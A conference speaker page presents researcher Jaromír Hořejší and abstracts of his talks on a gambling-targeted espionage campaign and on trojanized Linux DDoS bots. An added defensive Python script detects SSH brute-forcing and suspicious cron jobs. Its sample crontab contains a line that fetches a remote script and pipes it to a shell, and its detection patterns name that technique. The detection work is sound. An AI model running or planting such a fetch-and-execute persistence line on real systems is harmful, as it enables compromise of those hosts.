Last known affiliation: Trend Micro
Bio: Jaromir Horejsi is a threat researcher at Trend Micro. He specializes in hunting and reverse-engineering threats that target Windows and Linux. He has researched many types of threats over the course of his career, covering threats such as APTs, DDoS botnets, banking Trojans, click fraud and ransomware. He has successfully presented his research at RSAC, SAS, Virus Bulletin, HITB, FIRST, AVAR, Botconf and CARO.
Jaromír Hořejší 🗣 | Daniel Lunghi 🗣
Abstract
Despite being illegal in some countries, the global online gambling industry grows steadily year after year, and it has flourished in the current environment dominated by the global pandemic. Unsurprisingly, advanced threat actors have noticed this trend: we observed and analyzed campaigns targeting online gambling platforms.
In this research, we focus on a multiplatform (Windows and Linux) campaign involving known espionage tools as well as new malware families. The campaign is operated by individuals with knowledge of the Chinese language, and its victims are mostly online gambling customers in South East Asia.
We noticed some interesting infection vectors, such as backdoored or fake installers for popular applications, or even for a custom chat application, which suggests a very targeted campaign.
Peter Kálnai 🗣 | Jaromír Hořejší 🗣
Abstract
One of the capabilities of a malicious botnet is to perform a distributed denial of service (DDoS) attack. Attacks can be carried out by various methods, such as volumetric flooding, slow HTTP attacks or TCP protocol misuse. DNS amplification is an example of volumetric flooding that has become popular recently. It is well known that Trojans for the Windows platform whose resources contain a Chinese locale have a long tradition of interest in this type of attack and lack the other spying features that Trojans usually possess.
We present a survey of current trends in the usage of standalone grey-area tools performing DDoS on multiple platforms, focusing especially on the Linux and FreeBSD versions. These tools are later trojanized by adding persistence using executable droppers or scripts that edit the crontab. The infection vector starts with automated brute-forcing of the SSH protocol; the malicious flooding tools are then deployed on the compromised system and executed. The competition for resources, such as ports and CPU time, manifests as an initial attempt to kill and remove other, possibly flooding, processes. Variants for Windows x86/x64 are co-distributed already with persistence and carry a debug string ‘Chicken’ in the title.
The technical part of this analysis covers versions designed for several platforms and architectures. It includes the behavioral aspects of the initial droppers, the installation of the components performing DDoS, a description of the internet communication, and the collection of various system and performance statistics. For better insight, we will demonstrate several bot builders and C&C panels that we have acquired, and we will show screenshots of publicly available advertisements promoting the paid customizability of the Linux variants.
During our analysis, we connected to the botnets and monitored several C&C servers for a certain period of time, which gave us a chance to collect some statistics. We are therefore able to present particular examples of websites and services that were flooded, and we briefly discuss the motivation behind the selection of these attack targets.
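The infection chain described in the abstract above (SSH password brute-forcing, then persistence written into the crontab) leaves two artifacts a defender can triage on a Linux host. The following script is an added example written for this page, not code from the talk or from the botnet operators; the auth.log lines, the crontab contents, the IP addresses (RFC 5737 documentation ranges) and the file paths are all constructed, and the crontab heuristics are the editor's own, not indicators from the research.

```python
import re
from collections import Counter

# Constructed sshd auth.log excerpt (not from the talk or any real incident):
# a burst of failed passwords from one address followed by a successful password login.
AUTH_LOG = """\
Jan 10 03:12:01 host sshd[2101]: Failed password for root from 203.0.113.7 port 51212 ssh2
Jan 10 03:12:03 host sshd[2103]: Failed password for root from 203.0.113.7 port 51214 ssh2
Jan 10 03:12:04 host sshd[2105]: Failed password for invalid user admin from 203.0.113.7 port 51216 ssh2
Jan 10 03:12:06 host sshd[2107]: Failed password for root from 203.0.113.7 port 51218 ssh2
Jan 10 03:12:09 host sshd[2109]: Accepted password for root from 203.0.113.7 port 51220 ssh2
Jan 10 03:15:44 host sshd[2200]: Failed password for alice from 198.51.100.23 port 40001 ssh2
Jan 10 03:16:02 host sshd[2202]: Accepted publickey for alice from 198.51.100.23 port 40003 ssh2
"""

# Constructed crontab (hypothetical paths and host) resembling what a dropper might leave behind.
CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -fsSL http://203.0.113.9/x.sh | sh
@reboot /tmp/.x/flooder -d
"""

FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED_RE = re.compile(r"Accepted (\w+) for (\S+) from (\S+) port")


def ssh_bruteforce_sources(log_text, threshold=3):
    """Return {ip: (failed_attempts, password_login_after_failures)} for every
    source address with at least `threshold` failed password attempts.

    The boolean flags the pattern the abstract describes: a brute-force burst that
    ends in a successful *password* login from the same address. Key-based logins
    are not counted as a compromise here."""
    failures = Counter()
    compromised = set()
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[m.group(2)] += 1
            continue
        m = ACCEPTED_RE.search(line)
        if m and m.group(1) == "password" and failures[m.group(3)] >= threshold:
            compromised.add(m.group(3))
    return {ip: (n, ip in compromised) for ip, n in failures.items() if n >= threshold}


# Heuristics chosen for this example (editor's assumption, not from the research):
# remote content piped straight into a shell, or a job started from a
# world-writable directory, are typical of persistence written by a dropper.
SUSPICIOUS_CRON = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "remote script piped to shell"),
    (re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/"), "command in world-writable directory"),
]


def suspicious_cron_entries(crontab_text):
    """Return [(line, reason)] for every non-comment crontab line that matches a heuristic.
    Each line is reported once, with the first matching reason."""
    findings = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        for pattern, reason in SUSPICIOUS_CRON:
            if pattern.search(line):
                findings.append((line, reason))
                break
    return findings


if __name__ == "__main__":
    for ip, (n, owned) in ssh_bruteforce_sources(AUTH_LOG).items():
        print(f"{ip}: {n} failed password attempts, password login afterwards: {owned}")
    for line, reason in suspicious_cron_entries(CRONTAB):
        print(f"suspicious cron entry ({reason}): {line}")
```

On a live host the same functions would be fed `/var/log/auth.log` (or the `journalctl -u ssh` output) and the output of `crontab -l` for each user plus `/etc/crontab` and `/etc/cron.d/*`. The threshold and the cron heuristics are deliberately simple; a real deployment would also correlate the flagged address with newly created processes and listening sockets, since the abstract notes that these tools first kill competing processes and then bind their own resources.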